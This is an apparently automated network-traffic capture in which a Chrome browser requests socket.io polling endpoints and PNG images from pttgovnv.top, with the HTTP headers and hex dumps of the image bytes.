          2024-09-01 22:25:24 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liLtF&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:24 UTC601INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qs1cAmhgO8w1oHxaIEM6DnmQitNCT%2Bq8uWQQmLyQHgUTwH1wuMlaBGxF5lAEyIzH4zFLtmp5PYQzGYyDCRIxpX5WZpzZVxlqXI956DuO5vgrMj6fX4F4IoU3DTmzn%2B4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad113aaf435c-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:24 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          55192.168.2.449796172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:24 UTC599OUTGET /help/layout/images/33.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:24 UTC726INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: image/png
          Content-Length: 11236
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"2be4-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36233
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i7w2TPGUv%2F%2FSWMOoj6LjUsXvkKAwJZ9LhLQszUIrK4zSCVFot1EZpP9jT3u%2BXDJ4v4R73yEAZd0p4QZuX5NZioGN5C5mXYRhHoxjxhLuQmSm43UQ3eorI4L%2F5wZMnSQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad113f5c43bd-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC643INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2b 71 49 44 41 54 78 da ec dd 4d 56 1b d7 ba 06 e0 8a d7 e9 db 67 04 26 23 80 74 6f 07 79 04 26 ad 34 2d 8f c0 64 04 51 46 60 3c 02 cb cd db 0a 1e 81 e5 ce e9 1a 46 10 18 c1 35 23 f0 ad 0f b6 8e 65 02 48 55 7b 97 aa 4a 3c cf 5a 5a c9 39 01 51 bf bb de da bf 3f 7d fb f6 ad 02 00 60 5c 9e 38 04 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<+qIDATxMVg&#toy&4-dQF`<F5#eHU{J<ZZ9Q?}`\8BBB qqqqBBB
          2024-09-01 22:25:24 UTC1369INData Raw: 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 37 54 df fe b3 7f 5a 7f f6 1c 09 00 a0 2f ff 72 08 5a 39 a9 3f 67 75 90 9b fd f4 3f e7 27 0e c7 78 fc f4 bf e7 cf ea 7f 4c eb cf a4 fe 3c db f2 9f bf 58 fd 7c fb 6d 7f b1 e5 7d 8f 7d 3e aa 3f 07 6b 7e f4 2c ae f1 7a
          Data Ascii: qqBBB qqqBBB qqqBBB qqqBBBB7TZ/rZ9?gu?'xL<X|m}}>?k~,z
          2024-09-01 22:25:24 UTC1369INData Raw: 73 af 83 f3 34 ca 6e 2a 42 5c 77 41 ee 2c bd 79 2d c3 59 5c e4 67 b7 87 7f c7 cf c5 cc e6 f5 27 7e f6 e7 fa f3 7b a1 40 57 a5 37 cb f7 29 d0 cd d3 28 33 76 c3 db 42 d3 8f b0 65 05 3a d0 6f ea 79 a1 7b be 54 88 9b 0e f8 b4 94 38 4e 97 03 5b 86 eb f9 96 6a 3f 27 a3 bb 07 6f 26 30 bf 1a d1 4b 86 10 d7 53 90 bb 48 17 f8 87 f4 7f 45 4d d9 db 54 2b 37 b9 eb e7 53 b3 eb 6a a0 bb 2c b4 39 d7 35 74 a9 c9 f5 c4 48 d7 9d 30 77 08 46 a9 44 07 fa 6d 06 a7 45 a1 6d d9 1f 62 93 6a c1 a6 d4 d3 81 5e 6b bb f0 37 ba 70 7b 70 c4 2c ad e0 20 c4 f1 43 30 fb 9a 96 9e f9 75 25 f9 47 ad dc a7 54 3b b6 77 5f 00 4c 81 2e fe fb b2 c9 b5 c4 1c 34 f1 f0 88 3e 74 5f 52 98 d4 dc 3a 5e fb 69 c2 4a c6 65 9b 4d e1 2f 73 83 53 7a 19 2d d5 3a 30 c4 07 7e a9 6d 5a 0c 70 df 26 3b f2 37 ca 87
          Data Ascii: s4n*B\wA,y-Y\g'~{@W7)(3vBe:oy{T8N[j?'o&0KSHEMT+7Sj,95tH0wFDmEmbj^k7p{p, C0u%GT;w_L.4>t_R:^iJeM/sSz-:0~mZp&;7
          2024-09-01 22:25:24 UTC1369INData Raw: 92 61 76 5b 01 a8 e4 4b de d8 43 dc 90 47 13 0b 71 03 0c 72 11 96 5e 3f f0 46 10 eb a4 be 48 61 ea 43 7a db be eb 8d fb 6a e5 bf bd 2b 51 98 de 0a 73 6d 6b 0d a3 6a fc af 34 85 02 fd 3d 20 f7 07 b4 1f 7b b6 a3 d8 64 b2 a7 85 83 43 ee 00 87 8b aa cc 60 9c 5e 46 a9 16 6c 4a ed a3 e6 26 27 00 95 0c cd 47 3d ed 43 a9 17 e6 b3 3b ae e1 49 35 42 fa c4 6d 2f c8 45 1f b9 8b 54 08 af f6 07 78 99 1e 34 93 3e 07 0a a4 7e 6d d3 34 6f 5d 7c da 8c a4 6b dc 57 8f 41 be a5 52 4e ee 8b cd c7 d5 3e a7 f1 ef 69 99 be 57 99 db 94 3b a8 20 ee f1 52 cb 70 6d 7b 80 43 a9 65 b6 ce 46 56 3e 14 09 29 29 04 b7 ed 1e 10 4d d0 67 69 70 5f df e2 ba fb b4 f2 bf 67 d5 08 46 1a df a6 26 6e bb 41 69 91 02 db ed 37 80 b8 a2 2f 86 d0 b7 2c 6e b0 34 35 c9 9f 2d bf e2 bd 1a b9 ec 37 44 84 b8
          Data Ascii: av[KCGqr^?FHaCzj+Qsmkj4= {dC`^FlJ&'G=C;I5Bm/ETx4>~m4o]|kWARN>iW; Rpm{CeFV>))Mgip_gF&nAi7/,n45-7D
          2024-09-01 22:25:24 UTC1369INData Raw: 7f 52 ca 49 ee 4d 1c a3 50 63 c4 6a f5 cf 9a c0 bd f4 fd 5f 6f 5d 38 07 0f dc 10 f1 b3 67 7d 55 51 a7 65 c4 a6 0d 0a 6e 73 c6 dd 7f 7d 9e 56 f9 4d 3d 02 f2 6e 84 b8 8f 4d ba 4a 14 5a 86 6b 39 c0 61 9e f1 1d f3 02 21 ae 93 1a fb 42 4d a9 e7 3d cf 0d 57 3a c4 c5 f9 9e 35 38 86 cf 32 cf ef e0 43 5c 2a 8b 67 0f dc 4b cb fd ff a3 fe d9 cb 74 cd 9f d4 81 ae d7 81 2e 3b 1b e2 5a f4 7b db 4a 08 49 e1 e7 2c 5d 00 fb 2b 85 68 5c e4 c7 69 95 83 b1 3c 90 9b 14 dc fb 15 b7 af d1 e3 54 68 3c 2d f0 75 42 5c cf d2 d4 0d 7d 84 f1 d3 2a bf 09 f7 38 33 c4 95 a8 11 5c 86 8b d2 d7 72 89 1a be 93 01 5e 72 39 c1 68 bf 61 ed eb 24 e3 6f 0d ae 3f dc 1d 65 f1 ac 61 56 78 9e 7e 3e 96 e8 3a ea 73 20 d7 4e 8e 4e 4d fd de ce 0a 06 b8 eb 93 96 39 87 d7 6a 90 3b 4b 37 c5 bb 5b 6f c3 ef
          Data Ascii: RIMPcj_o]8g}UQens}VM=nMJZk9a!BM=W:582C\*gKt.;Z{JI,]+h\i<Th<-uB\}*83\r^r9ha$o?eaVx~>:s NNM9j;K7[o
          2024-09-01 22:25:24 UTC1369INData Raw: 6a 36 9a f6 8d f3 30 2d 5b a0 df ae d2 7f d3 e7 2c d8 03 13 35 c8 af ef 79 01 a1 3f 43 ed 38 3f 84 01 0e f3 2a 6f 35 81 eb 97 b9 36 4d aa 85 9a 52 c7 36 ea bb 78 88 4b c7 f1 69 4f db b4 f5 4a 87 96 15 33 d3 be 77 64 30 21 2e 1d c0 78 23 7d 53 e8 2b a3 8f d6 8b e8 f7 b6 e1 2c ca 4d 1f 90 fb a9 b9 97 f5 37 ec 26 c7 76 b2 a5 07 dc d8 c4 75 3c d1 84 3a 48 25 0a f0 e2 e7 b5 e0 a4 bb 63 ad 8d cb 3d 2f 57 29 84 3e 96 10 f7 f4 9e c0 9e 53 9b 39 e4 fe 70 55 ca 1a ff 78 4e 35 99 e6 2a 65 96 db 95 4d 9f 1f 5d 88 4b 6b 49 46 2a 7e 5f 15 5a 47 32 d5 5a 1c 34 e9 a8 98 1e 92 4d 4f c0 ac 62 9d 0f eb 6e e6 74 e3 1c de 13 94 1f 6b 8d 67 d4 62 fc 9e ae e3 33 97 d1 b0 14 1a d0 d0 65 93 5d 89 00 f5 32 73 a4 7b 89 20 74 b4 a5 df 29 7d ec b6 fb 1c bd 29 63 4b cf 17 97 53 49 b1
          Data Ascii: j60-[,5y?C8?*o56MR6xKiOJ3wd0!.x#}S+,M7&vu<:H%c=/W)>S9pUxN5*eM]KkIF*~_ZG2Z4MObntkgb3e]2s{ t)})cKSI
          2024-09-01 22:25:24 UTC1369INData Raw: 6d 11 39 93 be 0e 25 b8 1c f6 fc f7 8f 5c 46 ff bd 77 07 15 e2 aa 02 4d a9 3b 76 8e fa 0a 52 a3 eb 0f 97 82 5a 1c af fd 3b 32 c5 d1 ad 9f 9d dc 53 1e be ea 33 c8 3d 19 da 41 8d 0e 83 d5 4d 67 c2 36 de a7 d5 20 86 12 e4 de 76 19 2c c7 28 2d b7 b6 c9 83 e0 9d 49 70 8b f9 9a 79 ce 4a f5 f1 fc 3c c6 83 97 9a f0 5e b9 8c f2 02 53 aa ad bf cc fc fb 77 35 a9 3e e6 09 7e ef 3a ce 17 05 8e f3 98 c2 63 8e 79 75 ff 74 2a b7 af b3 87 02 ea ab be 9e f5 4f 86 78 54 a3 33 61 fd 8f 5f 5a 5e 88 7f a4 36 eb 67 1d 6d 5b d3 20 f7 5e 90 fb 47 81 b9 6e 72 df 18 8d aa 16 73 38 06 31 e2 7a dd c2 d4 43 0c 2e 3b 28 d6 32 9d 66 de ff b9 8e 56 02 76 6e 53 ea f9 0e cc 0d 37 94 40 35 aa 10 97 ca 93 fb 46 9b 9f 57 b7 6a 8e d3 64 fe f1 ec bf 1a d2 cb c0 93 a1 1e e0 95 7e 72 1f 5b fc 7a
          Data Ascii: m9%\FwM;vRZ;2S3=AMg6 v,(-IpyJ<^Sw5>~:cyut*OxT3a_Z^6gm[ ^Gnrs81zC.;(2fVvnS7@5FWjd~r[z
          2024-09-01 22:25:24 UTC1369INData Raw: 9e bb ec 17 37 e6 17 f2 fb 6a 82 a3 ec 88 d6 b9 af 2b 2f 84 cb cf b7 ea 66 8a 9e bb 06 d5 5c f5 71 cf 3f d9 f5 8b f8 56 98 db b4 59 33 4e d0 fb 34 72 74 52 78 7b 4e eb 4f 3c 54 5e 37 bc b9 0e d3 c5 f3 7f a9 e9 b7 b7 40 97 6a de e2 06 b8 48 a1 f7 a1 5a 8b d8 c7 68 3e 3d 7e 68 16 6c b6 77 3f 54 65 fa c6 6d f2 02 32 7b e8 3e a8 ca d6 0a b6 da 8e 7f 6c d7 cd 4a 04 25 06 34 7c 1e 41 0d 45 a9 07 ce cb 8c 26 d5 6d 3f f4 4e 1f e1 6d bf 18 e9 77 77 5d 16 ce d7 94 41 4f 57 5e 08 97 9f 07 43 61 1f cf b8 27 8f e5 2a 4e 61 6e 5a dd 0c 80 78 57 6d d6 01 71 3f 25 f2 45 07 61 6e be 12 e6 9a 3e cc 5e ae 04 ba b3 d4 6c 74 d4 65 a8 4b c1 2d 82 63 dc b4 7f a7 5a 8e 75 4d 4e 71 9c 35 9f 0e cf b4 da 4e 07 dc 97 03 d9 8e 26 13 9e 96 ea 5b 37 1f fa 45 90 a6 3e 29 75 fc db 36 a9
          Data Ascii: 7j+/f\q?VY3N4rtRx{NO<T^7@jHZh>=~hlw?Tem2{>lJ%4|AE&m?Nmww]AOW^Ca'*NanZxWmq?%Ean>^lteK-cZuMNq5N&[7E>)u6
          2024-09-01 22:25:24 UTC1010INData Raw: 33 c8 5d 9f f7 a1 f5 9d ca 38 c6 c5 82 4b bd 0d 8b aa 7d 53 66 b1 5a b0 96 81 b6 48 98 2d 54 1e dd f5 b2 71 9e fa d1 0b 71 8f e0 c1 b8 97 02 5d 9c f0 65 3f bb b8 b9 ce 04 ba ce 8f fb ec 56 98 be cb 65 2a 6c 4f 4c 9b f2 8f e3 77 b0 f2 59 ae 12 b2 3c 96 e7 e9 b8 cd ba ac 69 ee 72 3b d2 83 f6 b4 c1 83 6e 50 4d 76 99 0f d6 a6 2f 3a 9d 34 6d b5 38 07 83 0f 70 19 c7 f8 75 c9 81 19 19 21 b9 f8 b9 ae b7 25 f6 6b d3 7e 90 e7 e9 bc f6 5e db 9d ca 9f bf ef dc a7 8c 2e 24 42 1c 40 b9 07 4c 84 fd 75 93 7f c6 e8 f0 a3 5d 5a 54 3d 85 8c f9 9a 87 7c 04 a5 59 bd df 27 1d 6f cb 72 02 d6 4d 6a ae 96 2b 65 1c 0f fd 7c a4 63 7c ba 66 bf ae d2 be cc 3b bc be ff d8 f0 b8 76 76 ae d3 44 cf eb a6 3f 19 dc 7d 76 4f f7 1c 35 71 00 03 7a d8 2e 3b 2e df 6e c2 89 02 fc b4 44 df a0 01
          Data Ascii: 3]8K}SfZH-Tqq]e?Ve*lOLwY<ir;nPMv/:4m8pu!%k~^.$B@Lu]ZT=|Y'orMj+e|c|f;vvD?}vO5qz.;.nD


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          56192.168.2.449797104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:24 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liLtD&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:24 UTC607INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56uTFcnMHt7DYuTZgZtOJwy6QWHItYlscSHuHX9%2Bzg7HHN1EkcSt%2BiXFBukyaiufSDfSgOgzDiL0vF%2Bm%2BzEflxYXPWGSZbLbyTWRJa2YRXL4EyPWooYxb9%2F1TPoemFQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad116c5a8c78-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:24 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          57192.168.2.449798172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:24 UTC599OUTGET /help/layout/images/34.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC732INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: image/png
          Content-Length: 14568
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"38e8-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36233
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1M%2BI4c%2B0xLfcWm4p6yjl%2BZwLgIgoMGB8Y7iuU%2FOUrCO4sDXpAYsCI1%2FgOCgpr%2FsDERNkkBes3fDhB9yVLuaGyuOIP1L80kIodFl5zU51SfLBHesgI3N%2BBRkRkLDllHg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad130a8e42cc-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC637INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 38 75 49 44 41 54 78 da ec dd 3d 56 1b c9 de c7 f1 f2 3d 73 ce 84 f0 ac 00 4d 44 88 26 22 a4 bd 02 34 e1 8d 90 57 80 bc 02 e4 15 58 ac 00 11 39 b4 58 81 45 48 64 11 12 59 ac 60 50 78 23 9e fe 77 55 1b 59 06 a9 5f aa aa ab ba bf 9f 73 34 9e 19 83 d4 2a 75 ab 7e 5d af ef 9e 9f 9f 15 00 00 00 e2 f2 1f 8a 00 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<8uIDATx=V=sMD&"4WX9XEHdY`Px#wUY_s4*u~]Bq8@ B!8
          2024-09-01 22:25:25 UTC1369INData Raw: d2 7f 7e 4d 1f 8f e9 63 ac 8e 1f a6 14 0a 5e f3 e7 97 45 92 fe 91 04 72 38 4f e9 63 61 fe 7d f1 bf ff f6 9f 02 2c af fd f4 8f be 79 ec ef f8 f1 79 fa 58 a6 ef 63 d9 e0 71 16 2a f7 f4 18 17 5c 0d 00 21 0e e1 04 39 69 91 3b 35 ff b5 4a 1f d3 ec 71 fc c0 97 35 a4 92 97 a0 3f 49 1f 07 81 1f ea ad 09 76 12 88 e6 4d 06 bb b4 cc c6 e9 1f a3 f4 b1 57 f2 57 af e5 f7 7c 1c bb 09 6f f2 b9 9e 95 fc 55 f9 8e 18 a7 c7 38 e1 ea 00 08 71 68 3e c4 ed 9b ca ef e0 95 2f eb b9 79 2c d2 50 37 a7 b0 3a 19 e0 be 46 7a f8 b7 e6 86 64 e6 33 d0 a5 65 36 ad 10 8c d6 dd a7 8f c4 e5 31 9b 00 27 d7 f3 51 8d a7 b9 4c 8f 71 c4 55 02 10 e2 d0 7c 90 eb 9b 2f f5 5d 2d 07 d2 ed ba 34 3f bb cc 1e 84 bb 36 87 b8 a5 0a bf 05 ae 08 69 e1 9a b8 ee 0a b4 18 7a af d3 63 1d 06 1c 34 73 ef d3 e3 e4
          Data Ascii: ~Mc^Er8Oca},yyXcq*\!9i;5Jq5?IvMWW|oU8qh>/y,P7:Fzd3e61'QLqU|/]-4?6izc4s
          2024-09-01 22:25:25 UTC1369INData Raw: 01 57 8f 01 6c 95 3f bf 2c c6 26 a4 db 62 75 4c 5c 81 e3 df cf c2 b6 dd b1 92 8f e9 7b e8 6d 79 cd 26 bf 30 e5 5c 94 f2 9d a4 c7 f8 b4 e5 18 13 73 e3 d5 84 7b 73 fd 4f 7d 9e 0b 40 57 d1 12 87 17 7a e2 41 a2 ea 75 55 ed 99 f0 76 52 f0 67 e7 b5 77 55 d0 5d b9 43 a5 c7 e5 d9 de de eb 44 e9 56 39 ba d9 02 63 82 4c 62 f9 69 0f cc 84 8a 10 9d 98 d0 bd 08 78 26 ed 91 b9 99 fa 96 1e e3 94 b3 14 20 c4 c1 6f 90 5b 58 08 72 65 43 df d4 d2 b1 e7 61 4e 2a e1 4f 96 8f f1 ab 99 89 8b b0 82 dc c2 f2 67 ad cc f9 13 b2 03 6b d7 8c 5b 67 a6 b5 17 00 21 0e 0d 04 b9 6d 63 8e e4 ef 6c 4d 2e 38 b1 3a fe 4c cf 98 95 ca 23 6f 99 b3 e5 dc 8c e5 63 d2 43 58 41 4e 3e 6b 9b b3 96 93 08 de f6 51 1a 90 86 11 1c e7 88 19 bf 00 21 0e e1 05 39 e9 36 91 96 af 77 4a cf 16 95 9d 16 2e 4d b0
          Data Ascii: Wl?,&buL\{my&0\s{sO}@WzAuUvRgwU]CDV9cLbix& o[XreCaN*Ogk[g!mclM.8:L#ocCXAN>kQ!96wJ.M
          2024-09-01 22:25:25 UTC1369INData Raw: 0d c5 c2 9c 54 76 f2 1a b7 1b 7f 23 e1 74 11 f4 f2 21 55 c3 2b dd a2 4d 5d 3f 7d 19 7a 60 6e 80 7e a8 d7 d7 2f b4 85 cf 18 40 54 e8 4e 75 5b 01 0d 95 9b 71 6f bb 0c 94 eb b5 ae f4 18 b6 24 db 85 e1 d7 f7 98 2f 1f 22 01 6f d8 a2 81 fd f2 1e 9b 59 b7 2f 9e f3 fd 39 e2 c3 bf 66 26 25 80 d8 d0 12 e7 a6 32 93 f5 de e6 4a 8f a3 da 6b e0 10 fc b5 84 c9 a4 07 1d 56 64 49 81 f5 2e c7 97 e5 43 62 d8 37 b5 58 68 bd 2f f9 5b 07 5c 0d 51 90 f3 76 4c 31 00 20 c4 75 3b bc ad 8f d9 39 69 f0 50 8e cc fa 59 be 02 ce 53 b6 14 89 ee 62 bd 5e 0b 73 7a f9 10 bd 43 43 1b c2 dc 8c b3 bc 95 26 4c 68 00 40 88 eb 6e 78 cb c7 bd 49 17 e6 59 20 87 e5 7f 5c 9a b4 56 e9 05 82 25 40 4a cb dc e3 1b 61 ae 17 e9 47 5d 36 c4 dd 72 75 04 4f ce 51 26 34 00 20 c4 75 34 c0 0d 4d 78 7b 6b af d0
          Data Ascii: Tv#t!U+M]?}z`n~/@TNu[qo$/"oY/9f&%2JkVdI.Cb7Xh/[\QvL1 u;9iPYSb^szCC&Lh@nxIY \V%@JaG]6ruOQ&4 u4Mx{k
          2024-09-01 22:25:25 UTC1369INData Raw: 90 3b 6a e2 98 a3 24 3b 32 94 db 1b f5 27 d3 75 5d 66 8b 37 e9 b2 1d 53 e8 00 00 42 dc 8e 10 64 96 48 b8 b6 f0 74 b2 4f a9 f7 6e 4a 13 e4 86 aa 5a f7 f0 99 d9 4b 16 ee 94 2d 5f d7 9b b7 27 7c 24 d8 81 2d df 00 42 5c 54 61 4e 42 90 8d 25 48 4e d3 c7 dc f7 a6 f3 35 c7 f9 9d 37 bc 64 4a 6b 99 72 2d b3 a6 df 25 93 19 5a cf d5 4d 9e cd ee f7 3d 3e 26 80 10 17 5b 90 9b 2a 3b 4b 90 48 a5 bd f0 bd 81 79 cd 20 77 45 90 b3 1e e0 a4 b2 2e d3 0a 77 6f 26 ab a0 dd 5c 7d 2f 3c 39 38 7f 01 10 e2 a2 0a 72 f9 84 87 ba e3 e4 e4 4e f6 bb ef 60 44 90 0b ca 58 15 6f d1 90 cf 8b b2 0f 97 cd ad c5 7a 1d 0f 9b 00 08 71 4e 83 50 3e 4e ee 93 85 a7 93 60 34 f5 79 57 4b 90 6b 9e 99 cc 50 66 8f db 11 b3 51 3b c3 55 38 5a 44 72 9c 00 08 71 5e c2 d0 38 fd e3 bd d2 b3 05 eb 38 53 9e c7
          Data Ascii: ;j$;2'u]f7SBdHtOnJZK-_'|$-B\TaNB%HN57dJkr-%ZM=>&[*;KHy wE.wo&\}/<98rN`DXozqNP>N`4yWKkPfQ;U8ZDrq^88S
          2024-09-01 22:25:25 UTC1369INData Raw: bd 23 c4 b5 26 c8 95 0a 71 e6 38 e5 bb c0 f7 ac 5a 42 1c 40 88 c3 46 40 aa 32 08 ff da 84 91 45 43 c7 3b b0 19 1e 1c 93 f0 3b 53 2d 5c eb 8a 10 d7 9a 20 57 3a c4 35 14 e4 08 71 00 21 0e 16 03 9d f7 71 73 6b c7 2b 2d 8a c9 da 23 a4 6e d7 3c b8 4d db bc b6 15 21 ce 79 90 93 73 c8 47 eb 73 a5 10 67 8e 53 42 95 af 85 80 09 71 00 21 0e 05 03 5d 62 42 5d 91 31 74 f9 f6 3e 8d 85 96 b5 50 d7 5f fb d3 57 4b 86 84 b6 b9 7a 59 e2 64 d9 91 f3 84 10 e7 fe 9c 9e 2a f7 b3 56 2b 87 38 73 9c 65 b7 91 23 c4 01 84 38 78 ac 4c 06 aa 78 8b d7 bd f9 42 9f 35 1d 66 d6 66 94 ca 23 0f 79 aa 46 c0 bb 35 7f 4a 50 5d aa 97 e5 4b 9e 3a 7a 5e c8 e7 6c ad 3b 8d 10 f7 66 39 cb 98 d0 b1 c3 90 54 2b c4 79 0c 9c 84 38 80 10 87 9a 5f d6 3d f5 6b 37 e6 b6 ee 1e 59 bc 76 66 02 dd 53 c0 ef a7
          Data Ascii: #&q8ZB@F@2EC;;S-\ W:5q!qsk+-#n<M!ysGsgSBq!]bB]1t>P_WKzYd*V+8se#8xLxB5ff#yF5JP]K:z^l;f9T+y8_=k7YvfS
